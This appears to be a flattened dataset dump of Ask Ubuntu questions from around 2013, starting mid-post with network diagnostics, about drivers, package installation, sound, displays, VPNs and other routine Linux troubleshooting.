802.11b/g wireless lan controller ( rev 03 ) 00:09.0 ethernet controller : realtek semiconductor co. , ltd. rtl-8110sc/8169sc gigabit ethernet ( rev 10 ) 00:0b.0 ethernet controller : realtek semiconductor co. , ltd. rtl-8110sc/8169sc gigabit ethernet ( rev 10 ) 00:0f.0 ide interface : via technologies , inc . via vt6420 sata raid controller ( rev 80 ) 00:0f.1 ide interface : via technologies , inc. vt82c586a/b/vt82c686/a/b/vt823x/a/c pipc bus master ide ( rev 06 ) 00:10.0 usb controller : via technologies , inc. vt82xxxxx uhci usb 1.1 controller ( rev 81 ) 00:10.1 usb controller : via technologies , inc. vt82xxxxx uhci usb 1.1 controller ( rev 81 ) 00:10.2 usb controller : via technologies , inc. vt82xxxxx uhci usb 1.1 controller ( rev 81 ) 00:10.3 usb controller : via technologies , inc. vt82xxxxx uhci usb 1.1 controller ( rev 81 ) 00:10.4 usb controller : via technologies , inc. usb 2.0 ( rev 86 ) 00:11.0 isa bridge : via technologies , inc. vt8237 isa bridge [ kt600/k8t800/k8t890 south ] 00:11.5 multimedia audio controller : via technologies , inc. vt8233/a/8235/8237 ac97 audio controller ( rev 60 ) 01:00.0 vga compatible controller : via technologies , inc. cn700/p4m800 pro/p4m800 ce/vn800 graphics [ s3 unichrome pro ] ( rev 01 ) list of loaded drivers returned by lsmod : sudo lsmod module size used by usb_storage 39646 0 vesafb 13516 1 ppdev 12849 0 arc4 12473 2 snd_via82xx 24718 0 gameport 15060 1 snd_via82xx snd_ac97_codec 110213 1 snd_via82xx b43 342801 0 ac97_bus 12642 1 snd_ac97_codec snd_pcm 80916 2 snd_via82xx , snd_ac97_codec snd_timer 28931 1 snd_pcm snd_page_alloc 14108 2 snd_via82xx , snd_pcm snd_mpu401_uart 13865 1 snd_via82xx snd_rawmidi 25424 1 snd_mpu401_uart snd_seq_device 14172 1 snd_rawmidi snd 62218 7 snd_via82xx , snd_ac97_codec , snd_pcm , snd_timer , snd_mpu401_uart , snd_rawmidi , snd_seq_device mac80211 436493 1 b43 soundcore 14635 1 snd serio_raw 13027 0 i2c_viapro 12969 0 cfg80211 178877 2 b43 , mac80211 bcma 25651 1 b43 parport_pc 32114 1 shpchp 32265 0 mac_hid 13077 0 via_cputemp 13031 0 hwmon_vid 12723 1 via_cputemp lp 17455 0 parport 40930 3 ppdev , parport_pc , lp pata_via 13428 0 ssb 50691 1 b43 r8169 56396 0 sata_via 13495 2 driver info for the gigabit card : sudo modinfo r8169 filename : /lib/modules/3.2.0-51-generic-pae/kernel/drivers/net/ethernet/realtek/r8169.ko version : 6.017.00-napi license : gpl description : realtek rtl-8169 gigabit ethernet driver author : realtek and the linux r8169 crew < netdev @ vger.kernel.org > srcversion : 231149b837af2b63f7c0271 alias : pci : v00001186d00004300sv00001186sd00004c00bc*sc*i* alias : pci : v000010ecd00008169sv*sd*bc*sc*i* alias : pci : v000010ecd00008167sv*sd*bc*sc*i* depends : vermagic : 3.2.0-51-generic-pae smp mod_unload modversions 686 parm : speed : force phy operation . deprecated by ethtool ( 8 ) . ( array of int ) parm : duplex : force phy operation . deprecated by ethtool ( 8 ) . ( array of int ) parm : autoneg : force phy operation . deprecated by ethtool ( 8 ) . ( array of int ) parm : rx_copybreak : copy breakpoint for copy-only-tiny-frames ( int ) parm : use_dac : enable pci dac . unsafe on 32 bit pci slot . ( int ) parm : debug : debug verbosity level ( 0=none , ... , 16=all ) ( int ) ... and uname -a for good measure : uname -a linux hotblack 3.2.0-51-generic-pae # 77-ubuntu smp wed jul 24 20:40:32 utc 2013 i686 i686 i386 gnu/linux if anyone thinks any other debug output would be helpful to have , please do n't hesitate to ask . update for want of a better way to test a different driver , i 've also tried dropping back to an older kernel on boot , which returned r8169 to v2.3lk-napi , but the problem remained the same . i have , however , made an interesting discovery . if i use ethtool to force the card back to 100mb ... sudo ethtool -s eth0 speed 100 autoneg on duplex full sudo ethtool eth0 settings for eth0 : supported ports : [ tp ] supported link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/full supported pause frame use : no supports auto-negotiation : yes advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full advertised pause frame use : symmetric receive-only advertised auto-negotiation : yes speed : 100mb/s duplex : full port : twisted pair phyad : 0 transceiver : internal auto-negotiation : on mdi-x : unknown supports wake-on : pumbg wake-on : g current message level : 0x00000033 ( 51 ) drv probe ifdown ifup link detected : yes ... then iperf shows the connection working fine in both directions : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- server listening on tcp port 5001 tcp window size : 85.3 kbyte ( default ) -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- [ 4 ] local 192.168.1.95 port 5001 connected with 192.168.1.82 port 2437 [ id ] interval transfer bandwidth [ 4 ] 0.0-10.0 sec 105 mbytes 87.7 mbits/sec -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- client connecting to 192.168.1.82 , tcp port 5001 tcp window size : 83.9 kbyte ( default ) -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- [ 4 ] local 192.168.1.95 port 40844 connected with 192.168.1.82 port 5001 [ 4 ] 0.0-10.0 sec 113 mbytes 94.4 mbits/sec i 'm not certain exactly what to conclude from this , but it is at least further evidence that the upload speed is n't being constrained by the hardware ...
328681	installing the latest node.js / mongodb ?	how can i install node.js and mongodb so they are the most current versions ? the available versions from package manager are not up to date , and ppa from chris lea for node.js does n't get updated on a regular basis .
328687	upgrading a special software ( no matter if other softwares are up to date or outdated )	i just want to have the latest version of gimp . i have n't updated some other softwares and i want to focus on updating gimp to the latest version right now . any software-specific command , or command that has a switch to act on specific software only ?
328695	ca n't use keybinds when desktop icons are hidden and there 's no active window	desktop icons : disabled no window active action : press super or any other key result : nothing and desktop icons : enabled no window active action : press super or any other key result : opens whatever how can i make keybinds still works when desktop icons are disabled and no window is active ?
328698	ca n't use lightdm-webkit-greeter	i 'm trying to use lightdm-webkit-greeter instead of the default unity-greeter on ubuntu 13.04 . first i installed the greeter : sudo apt-get install lightdm-webkit-greeter then i ran this command to change the greeter : sudo /usr/lib/lightdm/lightdm-set-defaults -- greeter lightdm-webkit-greeter then i tested the greeter : lightdm -- test-mode all i see is a black screen , although i can move my mouse . i 've rebooted to test this as well , and it 's the same result . other greeters , such as lightdm-gtk-greeter and lightdm-kde-greeter work fine . why is n't lightdm-webkit-greeter working ?
328700	how do i change the volume control icon ?	i recently switched to gnome 3 ( love it ! ) , but the default icon theme was a little dreary and gray , so i switched that back to ubuntu-mono-dark . but now whenever i change my volume , i get this ugly pixelated icon show up . the forum says i do n't have enough reputation to post an screenshot , but it 's pixelated and ugly with these fuzzy straight blue lines that turn on as the volume goes up . i found identical images in the humanity and humanity-dark icon themes ( one example : /usr/share/icons/humanity/status/24/audio-volume-high.png ) . i tinkered with the images by changing their names , temporarily deleting them , etc . but it had no effect on the ugly icon . what file is responsible for violating the beauty of my desktop ? ! once i find it , i can replace it .
328701	ubuntu 12.04 not recognizing my 4 tb hdd	i am using a ssd as the main hard drive and want to use my 4tb hdd as a storage drive . however , i ca n't find it in ubuntu . i checked the bios , and it is known . edit disk /dev/sda : 240.1 gb , 240057409536 bytes 255 heads , 63 sectors/track , 29185 cylinders , total 468862128 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00048cf8 device boot start end blocks id system /dev/sda1 * 2048 435378175 217688064 83 linux /dev/sda2 435380222 468860927 16740353 5 extended /dev/sda5 435380224 468860927 16740352 82 linux swap / solaris disk /dev/sdb : 4000.8 gb , 4000787030016 bytes 255 heads , 63 sectors/track , 486401 cylinders , total 7814037168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 disk /dev/sdb does n't contain a valid partition table disk /dev/sdc : 8019 mb , 8019509248 bytes 20 heads , 16 sectors/track , 48947 cylinders , total 15663104 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc3072e18 device boot start end blocks id system /dev/sdc1 * 80 15663103 7831512 c w95 fat32 ( lba ) disk /dev/mapper/cryptswap1 : 17.1 gb , 17142120448 bytes 255 heads , 63 sectors/track , 2084 cylinders , total 33480704 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xf3c5ebb4 disk /dev/mapper/cryptswap1 does n't contain a valid partition table
328703	trying to change administrator password	i have tryed to change the password with the information that jorge castro has put up . when i get to the unix password change it says ( authentication token manipulation error ) then says password unchanged . is there another way to change it .
328713	ca n't connect to my wireless network	i 've just bought a new laptop and installed ubuntu 12.04 in it . my problem is that i can make a wired connection but not a wireless one . the wireless network is working okay with other computers but not with the new one . the new laptop ca n't detect it . can anyone help me ? on a terminal , typing lspci the output is 00:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation panther point pci express root port 2 ( rev c4 ) 00:1c.2 pci bridge : intel corporation panther point pci express root port 3 ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) 02:00.0 network controller : realtek semiconductor co. , ltd. device 8723 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 07 ) inspecting the drivers installed the one for the network controller : realtek semiconductor co. , ltd. device 8723 is not there . how do i install it ? thank you
328715	bcm 4313 lost connection on ubuntu 13.04	hope u can help me . i have a dell inspiron n4030 and using on it the ubuntu 13.04 . this notebook has a bcm 4313 broadcom wifi chipset , that is causing some headaches to me . it connects but , after a couple minutes lost the connection with internet . curiously it does n't lost the wifi connection , only the internet connection ( in other devices the internet keep active ) . i 've tried countless solutions that i found on the internet and nothing work =/ my kernel : 3.8.0-27-generic i 've tried with firmware-b43-installer and bcmwl-kernel-source and both give me the same problem . using a usb wireless adapter i can surf normally .
328716	i have a problem to install metasploit on ubuntu 12.04	i have installed metasploit on my ubuntu 12.04 but the problem when i write aboziad @ aboziad : ~ $ msfconsole could not find rake-10.0.4 in any of the sources run `bundle install` to install missing gems . i 'm the root which is aboziad and when i install bundle aboziad @ aboziad : ~ $ bundle install /usr/local/lib/ruby/gems/1.9.1/gems/bundler-1.3.5/lib/bundler/vendor/thor/shell/basic.rb:336 : warning : insecure world writable dir /usr/local/bin in path , mode 040777 bundler : :gemfilenotfound what is the problem please can some one help thanking your efforts
328722	no sound after update on ubuntu 12.04	as the title says , my sound has gone missing after an update with update-manager . i have found the solution before , but then had to reinstall ubuntu . it ca n't even detect my audio card . here is a screenshot of the sound settings . i have tried every single thing , including killall pulseaudio , updating the sound drivers , and removing the alsa plugins . this all happened after i updated through update-manager and i was wondering if i could rollback to stock without losing any data . note : this is not a duplicate , i have tried ( i 'm pretty sure ) every single possible solution .
328723	which languages are available in live dvd version ?	if there is no internet connection , which language else i could choose to use ubuntu localized .
328734	any apps for comparing two video files ? content wise on 12.04	i have an issue with lots of home videos . some with same name but with different content . and some with same content . is there an application that can compare the content or something and then either erase to duplicate or rename the file that just has the same name ? im running 12.04 64bit ! the files are named like vic0003.mp4 or 100_1622.mov . thanks for any help !
328741	ubuntu 13.04 fails to mount /boot	i probably screwed up my ubuntu installation , want to know if it 's possible to repair it without a re installation . what happened : i was trying to install virtualbox 4.2 on my ubuntu machine ( to run a windows vm to root my phone , that 's a whole nother issue ) . only issue is my computer probably wo n't be able to handle a virtual machine , but i wanted to see if it could ( it 's outdated ) . it almost completes installation , then my pc freezes and reboots . this is when i get the error , when attempting to boot up ubuntu : error mounting /boot . it only gives me the option to run a shell command or skip , and when skipping boots into my 'desktop ' with no graphic drivers/unity running . i attempted to run boot-repair from the live cd ( as in 'try ubuntu ' and running it from that machine ) , but am unable to chroot . any suggestions ? i do n't mind trying anything because i can just reinstall from scratch , just annoying having to download the drivers and things i had working .
328742	how do i set permissions in a raid 1data hard drive ?	i just set up 2 data hd on raid 1 in ubuntu 12.04 ( soft-raid ) , they are ext4 . however i ca n't figure out how to remove permissions on these drives to read and write . i tried using sudo chmod ugo+wx / however it did n't work . also tried : sudo chmod -r 777 * however , there are no files , and the permission needs to be set at the drive level , not files and directories . finally , i tried downloading pysdm but does not seem to work because drives are set in raid . any suggestions ?
328746	problems with kubuntu 13.04 laptop connecting to verizon wireless mifi	my kubuntu 13.04 dell latitude laptop is having issues connecting to my verizon wireless mifi . i am currently connected to a more restricted wireless signal w/o an issue , however as soon as i try and connect to my mifi the connection connects and hten drops . after it drops , the ssid is no longer visible from the list of wireless connections i have access to . my wife 's mac has no issue connecting to this device and my nexus 7 connects just as fine . it is just my kubuntu laptop that struggles . my mifi is protected using the wp2 security that is available to my mifi and i have verified i have put the correct password in several times . any help would be greatly appreciated .
328747	sharp and crisp gui in ubuntu ?	i have recently installed ubuntu with the hopes of doing software development in a linux environment . however , coming from a windows 7 environment , i ca n't help but notice how the default ubuntu gui ( unity ) feels so unsharp , uncrisp , unresponsive , bloated , taking up too much space , etc . for example , in windows 7 , the fonts are small but sharp and crisp , and the windows , forms and controls take up just the right amount of space . using ubuntu unity , instead it feels as if the desktop shrunk in size and everything feels so cluttered . what can i do to make my ubuntu experience feel less cramped , and make it feel more sharp , crisp and responsive , at least to what we 're accustomed to in windows ?
328748	how to enable nested virtualization in ubuntu	i would like to do some lib testing on my os . so i need several environment to run kvm . and i found my guest machine was not able to run kvm . i was using virtualbox 4.2 .
328752	do dell laptop touch screen monitors work with ubuntu 12.04/12.10 ?	i 'm about to buy a dell precision m6700 that i plan on dual booting windows 7 and ubuntu 12.04 ( or 12.10 , feel free to comment ) and i 'm wondering if i should get the touch screen monitor designed for windows 8 . i 'll be working on a plane a lot so the touch screen might be a nice alternative to the track pad when i do n't have room for a mouse . i found some people having trouble with it but i 'm not sure if it works for most people . also if you have it working it would be great to know if you find it useful . thanks , mike
328754	duplicate events in shotwell	i 've imported an existing collection of photographs into shotwell , and it organizes them into different events by date in the ui , and stores them by year/month in the filesystem . this is great , just what i want . however , there is a problem . although the filesystem layout is correct , and without duplicates , there are duplicate events for the same date in the ui : this is probably a bug , and as such should be reported somewhere . however , is there someway to easily merge all the duplicate events , either using the shotwell ui or with a shell script ?
328757	gvfsd-gphoto2 memory leak in ubuntu 13.04	i 'm running ubuntu 13.04 x64 on my laptop and often ( maybe once an hour ) it gets so slow and laggy that i can barely move the mouse . after checking system monitor , i 've found that in these situations a process called 'gvfsd-gphoto2 ' is taking up 4.6+ gb of memory , and after i kill it , everything is fine . seems like a weird memory leak . i 'm not using anything photo related . i 'm doing android development in eclipse and my htc one phone is plugged in to the laptop . has anyone run into this memory problem ? does anyone know of a fix or workaround ? or at least how to remove or prevent the process from running ?
328761	skip rc.local while booting	i 'm running ubuntu-10.04.2-server , accidentally somebody put command `` reboot '' on rc.local , so when i started ubuntu it always restarting , can i force ubuntu to not load rc.local ? thank you
328763	installing dishonored game from disc	i just purchased dishonored to use on my new linux ubuntu 12.04 machine . i can not , for the life of me , figure out what to do here to get steam installed with wine . every time i attempt to do so , i get a message that tells me i have to install to a hard drive . i have selected the .wine/drive_c directory , but it still tells me it is invalid and not a hard drive thst i am trying to install to . if anyone can give me a hand it would be highly appreciated .
328769	how to integrate a package updates in ubuntu ?	i have made a .deb file which i have hosted on an apache server . what i want is that the software should get updated automatically along with other software & ubuntu updates as shown in the image . how can i do that ? see the image below for clarification on what i want :
328772	not able to see the sound indicator in system notifications	this is what happened . skype used to crash continuously i removed pulseaudio put gnome-alsamixer the sound indicator stopped showing up i uninstalled gnome-alsamixer made pulseaudio start again i can use the sound now and i have no issues with skype anymore . may be the solution was something else but i can not see sound indicator anymore . i have to use the volume keys or use the sound in systems menu . how do i get it back ? i know its in there somewhere and needs enabling . but not sure where or what ? i will appreciate if someone can help
328776	videos only play when the window is resized to the smallest setting	hard to describe my issue in one sentence . basically any video i play off my hdd ( so either using the video player that comes with ubuntu 13.04 or vlc ) will only show the frames if the video player window size is small . after a certain point of resizing the player , the video just disappears ( though it 's still playing audio and will come back if i resize to the small window again ) . i realize my hardware is antiquated , but i am able to play movies in full screen on xbmc ( although occasionally my computer freezes and crashes . ) i do disable unity when using xbmc though , perhaps this is the issue i 'm facing .
328778	how to open shared folder within xp ?	can you describe me how to view files on xp machine after i made shared folder based on this article browser method preferable
328779	some font characters show up as boxes with numbers and letters inside of them	here is an image of what it looks like : http : //i.imgur.com/u5vqowa.png the top text is from firefox , and the bottom one is from mousepad ( liberation mono 10 ) . xubuntu 12.04 . there is a similar question to this one , altough no answer is given how to fix it . ok , i found the solution . i installed a package called fonts-tibetan-machine and now it works . thanks to `` jukka k. korpela '' for directing me to this site . so if you want to raise your dongers properly on ubuntu , make sure you have fonts-tibetan-machine installed .
328784	how to upgrade alsamixer in ubuntu 13	i resonantly ran a script which i thought would upgrade alsamixer , i think it downgraded it . whatever it did i now get crackly sound . i now have alsamixer version 1.0.16 . i have heard that there is a 1.0.27 version , how do i upgrade to this version of alsamixer ? thanks , aaron
328787	firefox freezes frequently	good day , the application firefox freezes very frequently and i have to use 'force quit '' to get out and hence i lose all my activities and it is extremely frustrating . only in one occasion , there was a pop-out message saying that this problem was going to be tracked but in all other occasions there is no tracking and no message i posted this error on ubuntu community and it was stopped and i was told to post it on launchpad . i did try to do so with no success as after reading pages and pages which i really do not understand who would read them and why so many ridiculous and tedious rules and information , i even could not find the place or the way to post this bug . and i thought of this askubuntu and so i am posting here in the hope for some useful help and i have to mention i am new to linux . just a few minutes ago , i opened the firefox through the terminal and it crashed very quickly and there are some error messages and i copy and paste them hoping they can help thank you in advance and look forward to your help and solving this frustrating problem/bug and if you wish you may post it on launchpad or do with report as you wish as long as the problem is solved . and here the messages appearing in terminal , after firefox crashed : ** ( firefox:4099 ) : warning ** : error calling add_icon method of contextcontext : timeout was reached ** ( firefox:4099 ) : warning ** : error calling set_homepage method of contextcontext : timeout was reached ** ( firefox:4099 ) : warning ** : error calling clear_indicator method of indicatorcontext : timeout was reached ** ( firefox:4099 ) : warning ** : error calling clear_indicator method of indicatorcontext : timeout was reached ** ( firefox:4099 ) : warning ** : error calling clear_indicator method of indicatorcontext : timeout was reached ** ( firefox:4099 ) : warning ** : error calling set_view_location method of contextcontext : timeout was reached ** ( firefox:4099 ) : warning ** : error calling set_view_window method of contextcontext : timeout was reached ** ( firefox:4099 ) : warning ** : error calling set_view_is_active method of contextcontext : timeout was reached killed
328789	screen becomes disorted	i am running ubuntu 13.04 , bt at times my screen becomes distorted and the words are not clear . cant seem to solve the problem , and i just end up restarting the machine . a solution will be highly appreciated . thank u .
328794	runlevel misunderstanding	as i known there is no classical init in ubuntu , instead of init ubuntu uses upstart . upstart is capable of fully simulation of classical init . the problem is i still do n't understand how upstart known which runlevel to boot now . for example , when i run ubuntu desktop how it knows that it needs to run runlevel for x and when i run ubuntu server how it knows to run runlevel for single-user mode . as i know there are different folders for each runlevel rc x.d , do you know what `` rc '' stands for ?
328798	trouble installing 12.0.4 into virtual box	install into virtual box seems to go along ok until the final screen - the restart occurs and a cli message tells me to `` please remove installation media and close tray ( if any ) then press enter '' regardless of the install being an iso image on the host system or an actual disk the system will not restart , the enter cmd does n't seem to work . how do i get this vm to restart ? ?
328804	screen turns black when lowering brightness	i have recently installed ubuntu 12.04 on my lenovo thinkpad edge e535 laptop along with jupiter for power saving . and every time i use fn key to alter the brightness , the screen turns blank and then turns off . it comes back after pressing a key or about 6 seconds . turning inactive is set to never , dimming to save power is unchecked , ran xset s off as well ... from time to time , the screen goes blank even without pressing anything . it happens even when jupiter is not running . does anybody have an idea what might be causing it ? i forgot to say that with ubuntu 13.04 , this did n't happen , but the screen sometimes seemed to be blinking though . this is the output : xrandr -- current screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 1600 x 1600 lvds connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 344mm x 193mm 1366x768 60.0*+ 50.0 1360x768 60.0 50.0 1280x768 60.0 50.0 1280x720 60.0 50.0 1024x768 60.0 50.0 1024x600 60.0 50.0 800x600 60.0 50.0 800x480 60.0 50.0 640x480 60.0 50.0 dfp1 disconnected ( normal left inverted right x axis y axis ) crt1 disconnected ( normal left inverted right x axis y axis ) new output rockstone @ rockstonepc : ~ $ lspci | grep vga 00:01.0 vga compatible controller : advanced micro devices [ amd ] nee ati device 9903 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati thames xt/gl [ radeon hd 7600m series ]
328805	php cli hangs after ppa update to 5.5	i remember having the exact same pb on my other machine , and i know i fixed in then , but i do n't remember how ... after installing php/apache/mysql/phpmyadmin from the usual repositories , i added ppa : ondrej/php5 and ppa : ondrej/apache2 , and upgraded everything in order to use php5.5 . now , when i type php -a in console , the shell hangs after printing `` interactive mode enabled '' and i have no prompt . how do i get my cli back ? many thanks in advance : )
328810	ubuntu mobile os/ubuntu for phones : how much control do you have over your data ?	i know that this [ closed ] question is similar , so i 'd like to be more specific : using ubuntu phone , what data will be stored `` in the cloud '' ? namely contacts calendar call history email ? will i need to get an ubuntu one account to be able to use ubuntu phone ( as i need a google account for android ) ? can ubuntu phone be configured such that it 's sync behaviour is like for the old windows mobile series , i.e . sync between laptop/phone only via usb , avoiding the cloud completely and working even without an internet connection ? it seems like even an open source os like android are quite hard to set up such that your personal data does n't `` rush off '' to google accidentally , so i am wondering where ubuntu mobile os stands with regards to control over your data . i noticed that the ubuntu tablet site states the following : ubuntu one already has millions of users on ubuntu , android , windows and mac . deeply integrated on ubuntu devices , it provides free storage , paid-for music streaming services and a foundation for cloud-based services from operators and device makers . ... which does n't clearly define what can or has to be shared and how easy it is to turn it off . i could n't find anything about ubuntu phone on that matter . i also just found this question on reddit about the ubuntu edge phone , and the following answer : we 're entering a really interesting phase where in a sense our very own tools spy on us . we will certainly have an easier time providing transparency on the origin of the code in the platform than , say , your average android device , where it 's all a big hacky mush . the core os which will be updated regularly on the ubuntu phones is all traceable directly back to standard ubuntu source and binary packages . there will be a core piece on each phone which handles the hardware , consisting of kernel and drivers and firmware and interfaces to things like the radio . that 's where unhealthy things could creep in from manufacturers and carriers . we can offer ... constructive guidance there . unfortunately again no details about the control over your data , unless it will be totally app-specific what data will be shared ... but i guess there will be a stock set of contacts , phone , email and appointments apps , right ?
328815	use notifyosd with i3wm window manager	i use i3wm as window manager , but something seems to be broken . i want to use notifyosd as a notification service , but i am not able to set it as a default service . at the moment i get ugly blueish angular notofication messages in the top left window corner ( maybe dunst ) . how can i install notifyos and set it as default ? even if i use unity as wm , notifyosd does not work .
328821	how to make my computer turn on automatically	i want to make my computer to turn back on automatically when it is powered off by some reason . is this possible ?
328823	vpn autoconnect	im using ubuntu 13.04 with gnome and i recently set up a ( open ) vpn . is there any way to enable it by default ? each time i boot or even lost my connection , i have to enable the vpn manually . is there an option i am missing ?
328826	install software in different drive	i 've recently moved to ubuntu 13.04 64bit . i want to install android adt into this os . but the problem is , the partition i made for this os is very less . are there any other options to install software into different drive as in windows os . if there are any options please tell . thanks
328834	how to replace win 7 and keep files without backing them up	completely new to ubuntu , just learned about it a day ago and needed a free os so decided to check it out . i previously had windows 7 installed on my hdd with two partitions . windows and essentials for c ( 30gb ) and games/music/movies for d ( 900gb ) . my windows stopped working ( failed to load from boot disk ) so i decided to switch over . i loaded up 13.04 unto a usb and installed it while formatting c and win7 loader to ext3 . did n't unmount everything because i ca n't back up 900gb of files . now when i load my hdd from the boot menu , all i get is a 'missing operating system ' message . is there any way to delete windows 7 completely to use ubuntu exclusively , and keep my files without buying another hdd ? ? ?
328835	how to receive email notification for linux server memory utilization	i have a critical webserevr running on ubuntu . i need to receive email notification whenever server cpu utilization and memory utilization goes above a threshold . how can i do this ?
328836	glade , quickly and changing an image with code	i have created the default ubuntu-application template using quickly and i 'm trying to work out how to change the displayed image through code . the default image shows an ubuntu logo with the path `` ... /media/background.png '' within glade . if i open the projects window python file ( testwindow.py as the projects name is test ) and add the following lines at the base of the finish_initializing function ( changing nothing else within the default files created ) , self.png = self.builder.get_object ( `` image1 '' ) self.png.set_from_file ( `` ../media/background.png '' ) the program runs but instead of the ubuntu logo , the small missing file icon displays . however no error message displays in the terminal and changing the png file to another png , or moving it to the same directory as the python file ( changing the second lines file to `` background.png '' ) gives the same issue . i can use the clear ( ) function to remove the image successfully but i 'm clearly doing something wrong and i ca n't seem to make any headway into the documentation for the image widget . in case it helps to know what i 'm aiming to do , i 'm trying to create a simple flashcard program , displaying a japanese character and requiring the user to input the correct pronunciation and displaying another image of a new character if the user is successful . thank you for any help you can give !
328838	distributing your software professionally in ubuntu ?	i have made a .deb package which i have hosted on an apache server . people can do apt-get install from my repository . when people do `` apt-get install mypackage '' . they get an unauthorized warning . to solve the warning i signed the package with gpg and generated the public key . my client then add the public key from an url after which they do n't get the warning . now what i want is that my client should not get warning without going into trouble of downloading public key and then adding it to apt-keys . like any other famous software packages .
328843	focus or open window in gnome on keyboard shortcut	as described here ( askubuntu.com/questions/234206/shortcut-to-switch-to-app/328842 ) the wmctrl gives you access to your windows . so you can switch via keyboard . but i like to have one shortcut to open and focus if it is yet open . is there a tool for that ?
328844	ethernet in new notebook stopped working , even from ubuntu executed live from usb . i have no idea what to do : (	i 've bought a new notebook and ethernet stopped working , even from a live execution of ubuntu . also wi-fi is n't working and i needed ethernet to solve that problem using this guide how do i get a ralink rt3290 wireless card working ? i 'm in real panic : (
328845	how to auto associate microsoft office extensions to libre office	how to auto associate microsoft office extensions to libre office . so that if we open a docx file it automatically uses the libre office writer .
328846	software download from windows os	could i search and download ubuntu 's packages using windows os . if can then please tell me , whats the website . many thanks .
328850	network manager removed	i was installing some arp tools and accidentally iv installed `` arping '' on my ubuntu 13.04 . now iputils-arping it 's removed also network-manager and i do n't have an internet connection on my laptop . i tryed to remove arping and install iputils-arping from a downloaded packge but it wont work coz they are in conflict with each other . also i ca n't install network-manager . enn @ em616 : ~ $ sudo dpkg -i network-manager_0.9.6.0-0ubuntu7_i386.deb selecting previously unselected package network-manager . ( reading database ... 212384 files and directories currently installed . ) unpacking network-manager ( from network-manager_0.9.6.0-0ubuntu7_i386.deb ) ... dpkg : dependency problems prevent configuration of network-manager : network-manager depends on iputils-arping ; however : package iputils-arping is not installed . dpkg : error processing network-manager ( -- install ) : dependency problems - leaving unconfigured processing triggers for man-db ... processing triggers for ureadahead ... errors were encountered while processing : network-manager
328855	how do i enable files/folders to be shared on the same pc	i 'm new to ubuntu . just spent a couple of days overcoming all sorts of minor problems and performing tweaks and downloading apps etc.. having installing 12.04 ( 32 bit ) onto an old xp machine leaving windows in a separate partition for optional booting . basically very impressed with everything . however have just hit a brick wall , there does not seem to be a simple way of enabling other users of the same computer accessing each others ' files . even the music files only seem to be available to the user that downloaded them . surely ubuntu does not require that each user has a complete duplicate copy of the music library . and how do two users have access to a commonly used file that they mutually update . what am i missing ... . ?
328858	how do i apply the maas bug fix ?	i am having this bug on my 12.03 ubuntu , https : //bugs.launchpad.net/maas/+bug/1204507 but i dont know how to apply the bug fix ?
328860	shortcut for switching keyboard layouts without cycling through all options	i am using ubuntu 13.04 with multiple keyboard layouts . i would like to have a keyboard shortcut for each of the keyboard layouts i am using to directly enable it , without cycling through all the choices . is there such a possibility ?
328861	netflix on ubuntu from france	i am a recent ubuntu ( 12.04 ) user from france , and i 'm trying to find a way to use my linux laptop as my main pc . i stepped upon erich hoover 's wonderful program `` netflix desktop '' on this webpage http : //www.iheartubuntu.com/2012/11/ppa-for-netflix-desktop-app.html . unfortunately , i can not use it since ... i 'm from france and i usually use , on my windows7 , '' hola unblocker '' extension for chrome ( https : //hola.org/ ) which i installed on firefox to try to be able to use netflix from this program on my ubuntu notebook . but it does n't work , unless i use a proxy . i do n't wish to pay for a proxy in addition to netflix , but would like to use it . does anyone has a clue , how could i do that ? kind regards ps : i mailed the soft author which was really kind and told me he will try to look into it on the next versions .
328864	ubuntu 12.04 update requires lubuntu 13.04 cd/dvd	running 12.04 and have been applying updates when notified by update manager . up until now the updates have always been applied with no issues . with the latest update , the process stops and a message is displayed `` cd/dvd 'lubuntu 13.04_raring ringtail_-release i385 ( 20130423.1 ) ' is required . please insert the above cd/dvd into the drive 'media/cdrom ' to install software packages from it . '' i could download and burn a 13.04 lubuntu iso and follow the instructions in the message , but something is not right here . that is , if i am running 12.04 ubuntu , why would an update require lubuntu 13.04 ? ? has anyone seen this same issue ?
